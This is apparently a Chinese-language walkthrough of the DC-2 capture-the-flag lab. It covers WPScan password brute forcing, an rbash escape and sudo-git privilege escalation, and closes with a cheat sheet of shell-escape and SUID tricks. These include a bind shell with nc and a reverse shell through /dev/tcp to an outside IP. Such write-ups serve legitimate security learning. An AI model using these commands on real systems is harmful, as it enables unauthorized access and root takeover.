DC-2
Created: November 10, 2023 3:01 PM
Tags: WordPress, git提权, rbash逃逸
Owner: 只会摸鱼
靶场过程
信息收集
-
扫描存活主机,找到靶机ip:192.168.199.131(本机是192.168.199.129)
-
扫描端口开放协议
- 发现有80端口和7744,但80端口有重定向,尝试直接访问无法访问。 因重定向页面为http://dc-2/,固修改/etc/hosts文件,将靶机ip绑定在该网址,再次直接访问,可正常跳转。
- 发现有80端口和7744,但80端口有重定向,尝试直接访问无法访问。 因重定向页面为http://dc-2/,固修改/etc/hosts文件,将靶机ip绑定在该网址,再次直接访问,可正常跳转。
-
指纹识别
- 可尝试利用WordPress4.7的漏洞
- 使用msf模块利用无果
-
返回页面查看是否有其他信息提示
-
发现了页面提供了flag提示信息
-
提示了使用cewl 得到字典, 使用尝试使用身份登录
kali密码攻击工具——Cewl使用指南 | 码农网
-
漏洞利用
- 后台目录爆破一下,发现有login页面,访问一下,跳转到登陆页面。
-
使用cewl输出字典,到文件dicts.txt
-
因使用的是WordPress,可使用专门针对此CMS的工具WPScan进行枚举用户名,并爆破。
- 枚举用户名,得到三个用户。
- 枚举用户名,得到三个用户。
-
逐个对三个用户进行密码爆破。
-
wpscan --url dc-2 -U ‘admin,jerry,tom’ -P ~/Desktop/dicts.txt
-
只有jerry 和tom爆破出了密码
-
-
尝试登录,jerry登陆成功,找到第二个flag
- 翻译一下,让寻找其他切入点,没办法,只剩下了7744端口的ssh服务了
提权
-
尝试ssh登录,使用jerry和tom账号,使用jerry账号和密码,无论怎么尝试都无法登录,尝试使用tom账号和密码,成功登录。
- 尝试一些命令,发现都没有权限
- 尝试一些命令,发现都没有权限
-
应该是rbash,尝试rbash逃逸
-
查看有哪些命令权限
-
使用vi设置shell
-
直接输入vi进入编辑器页面,按esc+:输入命令set shell=/bin/bash回车后在输入:shell
-
回车后会弹出如下页面,即成功,接下来要配置环境变量以正常执行命令。
-
配置完,即可正常执行shell命令
-
查看flag3文件,发现提示,让使用登录tom后用su命令切换到jerry
-
使用jerry的密码尝试登陆,发现成*
-
-
-
查找flag文件
-
find / -name “*flag*”
-
找到了flag4,得到了提示, git 提权
-
使用sudo git help config打开config页面
-
输入!/bin/bash
-
-
回车后,弹出root交互shell,即成功,找到最后的flag读出。
-
rbash逃逸
rbash是什么
它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
简单理解就是最低权限的用户
如何设置rbash
cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash
useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash
mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令
逃逸方法
枚举Linux环境(为逃逸rbash做信息收集)
echo $PATH # 弹出当前PATH环境变量
echo 路径+ /* #路径使用最后为bin目录的,以找到当前所有可以执行的程序命令
常用逃逸技术
nmap
适用版本:nmap2.02至5.21
在早期nmap版本中,带有交互模式,因而允许用户执行shell命令
使用如下命令进入nmap交互模式:
nmap --interactive
在nmap交互模式中 通过如下命令提权
nmap> !sh
msf当中也有利用nmap进行提权的模块
exploit/unix/local/setuid_nmap
find
find比较常用,find用来在系统中查找文件。同时,它也有执行命令的能力。 因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。
提权如下:
#进入shell
find anyfile -exec '/bin/sh' \; 或者 find anyfile -exec '/bin/bash' \;
#其中find 常用
find / -exec '/bin/bash' \; 或者 find / -exec '/bin/sh' \;
linux一般都安装了nc 我们也可以利用nc 广播或反弹shell
广播shell:
find user -exec nc -lvp 4444 -e '/bin/sh' \;
#或者
find user -exec nc -lvp 4444 -e '/bin/bash' \;
在攻击机上:
nc 靶机ip 4444
反弹shell
find anyfile -exec bash -c 'bash -i >& /dev/tcp/114.xxx.xxx.96/4444 0>&1' \;
在攻击机上:
nc -lvvp 4444
Vim
vim的主要用途是做编辑器,是,如果以SUID运行,它将继承root用户的权限,因此可以读取系统上的所有文件。
vim.tiny /etc/passwd
通过vim进入shell
vim.tiny
#vim命令
:set shell = '/bin/sh'
:shell
设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
Vi
通过vi进入shell
vi
#vi命令
:set shell = '/bin/sh' 或者 :set shell='/bin/bash'
:shell
设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
Bash
- 方法一
BASH_CMDS设置shell
BASH_CMDS[x]=/bin/bash
#设置了个x变量shell
x
#相当于执行shell
设置一下环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- 方法二
以下命令将以root身份打开一个bash shell。
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
less
less命令也可以进入shell
less /etc/passwd
#在less中输入:
!/bin/sh 或者 !/bin/bash
more
more命令进入shell和less相同
more /etc/passwd
#在more中输入:
!/bin/sh 或者 !/bin/bash
要注意的是使用more和less一定读取一个比较大的文件,如果文件太小无法进入翻页功能也就无法使用!命令进入shell
nano
nano也算是比较上古的文本编辑器了
nano进入shell的方法为
nano #进入nano编辑器
Ctrl + R
Ctrl + X
#即可输入命令
cp
使用cp 命令覆盖原来的/etc/passwd文件
awk
awk命令进入shell:
awk 'BEGIN {system("/bin/bash")}'
Git提权
-
前提是执行sudo -l 提示不需要密码可以使用git命令
方法一
sudo git help config #在末行命令模式直接输入
!/bin/bash 或 !'sh' #完成提权
方法二
sudo git -p help #弹出help信息窗口
!/bin/bash #输入后,即可打开一个用户为root的shell
